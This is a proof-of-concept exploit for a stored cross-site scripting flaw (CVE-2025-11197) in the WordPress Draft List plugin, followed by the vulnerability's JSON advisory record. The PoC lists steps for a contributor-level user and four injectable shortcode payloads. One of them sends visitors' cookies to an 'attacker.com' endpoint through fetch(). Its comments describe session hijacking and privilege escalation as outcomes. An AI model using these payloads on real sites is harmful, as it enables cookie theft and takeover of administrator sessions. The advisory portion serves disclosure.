CVE-2025-11197

<!-- PoC for CVE-2025-11197 - Stored XSS in WordPress Draft List Plugin The following shortcode payload can be injected by an authenticated contributor to execute arbitrary JavaScript when any user visits the affected page. --> <!-- Step 1: Create a new post/page as a contributor-level user --> <!-- Step 2: Insert the following shortcode in the content editor --> [drafts title=""><script>alert('XSS-CVE-2025-11197-'+document.cookie)</script><div data-x=""] <!-- Alternative payloads for different contexts --> <!-- Payload 2: Event handler injection --> [drafts title="test" onmouseover="alert(1)" data-x=""] <!-- Payload 3: Image tag with onerror --> [drafts title="<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>"] <!-- Payload 4: SVG-based XSS --> [drafts title="<svg onload=alert(document.domain)>"] <!-- Expected behavior: - The malicious script is stored in the WordPress database as part of the post content. - When any user (including administrators) views the post/page, the injected JavaScript executes in their browser context. - This can lead to session hijacking, cookie theft, privilege escalation, or arbitrary actions performed on behalf of the victim. -->

{"cve": {"id": "CVE-2025-11197", "sourceIdentifier": "[email protected]", "published": "2025-10-11T08:15:31.967", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Draft List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'drafts' shortcode in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/dartiss/draft-list/pull/81/files", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3376385%40simple-draft-list&new=3376385%40simple-draft-list&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4711e3d5-b70c-413e-97e7-6d2e93e8217e?source=cve", "source": "[email protected]"}]}}